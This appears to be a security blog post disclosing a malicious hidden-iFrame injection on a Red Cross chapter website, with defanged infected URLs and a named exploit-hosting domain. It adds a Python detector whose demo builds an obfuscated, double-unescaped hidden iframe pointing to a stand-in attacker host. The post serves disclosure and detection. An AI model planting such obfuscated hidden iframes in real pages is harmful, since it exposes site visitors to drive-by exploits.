In this morning's logs I noticed that Zscaler detected malicious content within redcross-esc.org web pages. It turns out that the site was the victim of a malicious iFrame injection, and I thought a short post on this would be a good follow-up to Umesh's previous post on hidden malicious iFrames.
redcross-esc.org belongs to the American Red Cross East Shoreline Chapter and is hosted on GoDaddy. Pages infected include:
- hxxp://www.redcross-esc.org/gethelp/index.html
- hxxp://www.redcross-esc.org/getinvolved/index.html
- hxxp://www.redcross-esc.org/givemoney/index.html
Screenshot of the malicious iFrame:
Screenshot of the first stage decode:
Screenshot of the final decode, which writes an iFrame pointing to hxxp://foxionserl.com/:
Fortunately the foxionserl.com domain is not currently resolving, so the malicious page is not being pulled; Google results show that it had hosted an Adobe Acrobat PDF Reader exploit. Notifications are being sent to the Red Cross and GoDaddy.
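To illustrate the defender's side of the two-stage decode shown above, here is an added example (not code from the original post or from Zscaler) that peels nested `document.write(unescape(...))` layers out of fetched HTML and flags iFrames that are hidden or that only appear after decoding. The sample page and the `attacker.invalid` destination are constructed for the demo and are not the real redcross-esc.org content.

```python
import re
from urllib.parse import quote, unquote

# Constructed sample (NOT the real infected page): a 1x1 hidden iframe wrapped in two
# layers of document.write(unescape(...)), built with quote() which mimics JS escape().
FINAL_IFRAME = ('<iframe src="http://attacker.invalid/" width="1" height="1" '
                'style="visibility:hidden"></iframe>')
STAGE1 = f'<script>document.write(unescape("{quote(FINAL_IFRAME, safe="")}"))</script>'
SAMPLE_HTML = ('<html><body><h1>Get Help</h1>\n'
               f'<script>document.write(unescape("{quote(STAGE1, safe="")}"))</script>\n'
               '</body></html>')

UNESCAPE_CALL = re.compile(r'unescape\(\s*["\']([^"\']*)["\']\s*\)', re.I)
IFRAME_TAG = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR = re.compile(r'([\w-]+)\s*=\s*["\']?([^"\'\s>]*)')

def js_unescape(s):
    """JS unescape() also decodes %uXXXX sequences, which urllib's unquote() ignores."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)

def decode_layers(html, max_depth=5):
    """Return [html, stage1, stage2, ...]: each layer is the decoded unescape() payloads
    found in the previous one. Stops when a layer contains no further unescape() calls."""
    layers = [html]
    for _ in range(max_depth):
        found = [js_unescape(m.group(1)) for m in UNESCAPE_CALL.finditer(layers[-1])]
        if not found:
            break
        layers.append("\n".join(found))
    return layers

def is_hidden(attrs):
    """True for 0/1 pixel frames or CSS that hides the frame from the visitor."""
    a = {k.lower(): v.lower() for k, v in ATTR.findall(attrs)}
    style = a.get('style', '').replace(' ', '')
    tiny = all(a.get(d, '100').rstrip('px') in ('0', '1') for d in ('width', 'height'))
    return tiny or 'display:none' in style or 'visibility:hidden' in style

def find_suspicious_iframes(html):
    """Flag iframes that are hidden, or that only exist after decoding an obfuscated layer."""
    hits = []
    for depth, layer in enumerate(decode_layers(html)):
        for m in IFRAME_TAG.finditer(layer):
            attrs = m.group(1)
            a = {k.lower(): v for k, v in ATTR.findall(attrs)}
            if depth > 0 or is_hidden(attrs):
                hits.append({'src': a.get('src', ''), 'depth': depth, 'hidden': is_hidden(attrs)})
    return hits
```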